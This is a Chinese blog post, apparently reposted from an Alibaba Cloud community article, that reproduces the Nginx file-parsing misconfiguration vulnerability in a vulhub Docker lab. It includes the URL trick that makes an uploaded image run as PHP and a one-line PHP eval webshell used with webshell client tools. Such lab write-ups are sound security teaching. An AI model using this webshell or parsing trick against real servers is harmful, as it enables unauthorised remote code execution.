您现在的位置是:首页 > 文章详情

Nginx 解析漏洞复现

日期:2018-09-26点击:822
漏洞环境搭建
Nginx 解析漏洞复现步骤如下:
  • 靶机环境
CentOS7 nginx/1.15.3 PHP Version 7.2.10 

由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

  • 启动环境
[root@localhost ~]# cd vulhub/nginx/nginx_parsing_vulnerability/ [root@localhost nginx_parsing_vulnerability]# systemctl start docker.service [root@localhost nginx_parsing_vulnerability]# docker-compose build [root@localhost nginx_parsing_vulnerability]# docker-compose up -d 

2). 访问 http://IP/uploadfiles/nginx.png/.php 如下所示:

img_87c58115f3304376fd08a41a99095084.png
2.png

通过测试可以看出这就是传说中的nginx解析漏洞:在/nginx.png后加/.php会将nginx.png当成php解析

  • 利用此解析漏洞拿webshell
img_eba2a375e87a96f1b90390ab2ac3cce0.png
3.png

一句话:

<?php eval($_POST['zzqsmile'])?> 
img_21cf20422a6ecd7220afdc23edfc70cc.png
4.png
  • 最后要注意的是做完漏洞测试实验后记得移除环境
[root@localhost nginx_parsing_vulnerability]# docker-compose down Stopping nginxparsingvulnerability_nginx_1 ... done Stopping nginxparsingvulnerability_php_1 ... done Removing nginxparsingvulnerability_nginx_1 ... done Removing nginxparsingvulnerability_php_1 ... done Removing network nginxparsingvulnerability_default [root@localhost nginx_parsing_vulnerability]# 

在拿webshell时候本来应该很简单,但是开始怎么做菜刀都不能连接成功,后来排错,最后得出可能由于环境问题,菜刀连接不上,不得不用这个之前不知道的蚁剑神器了,弄的我怀疑人生,换个工具一下就连接上,没毛病。


原文链接:https://yq.aliyun.com/articles/666671
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

文章评论

共有0条评论来说两句吧...

文章二维码

扫描即可查看该文章

点击排行

推荐阅读

最新文章